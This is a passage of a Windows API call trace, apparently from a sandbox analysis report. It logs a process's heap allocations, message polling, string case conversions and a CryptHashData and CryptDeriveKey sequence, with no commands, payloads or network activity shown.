Size=0x18) returned 0x2466e30 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0267.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.209] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.209] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.210] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.210] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0267.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0267.211] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.211] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.212] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.212] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.212] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.212] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.212] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.213] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.213] CryptHashData (hHash=0xaa58a0, pbData=0x24b1c28, dwDataLen=0x3, dwFlags=0x1) returned 1 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e50 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0267.213] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0267.214] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.214] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.214] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.214] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.215] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.215] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.215] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.215] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.215] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.216] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.216] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.216] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.216] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.216] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa59a0) returned 1 [0267.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0267.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0267.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0267.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0267.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0267.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.221] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.222] RtlAllocateHeap (HeapHandle=0x25c0000, 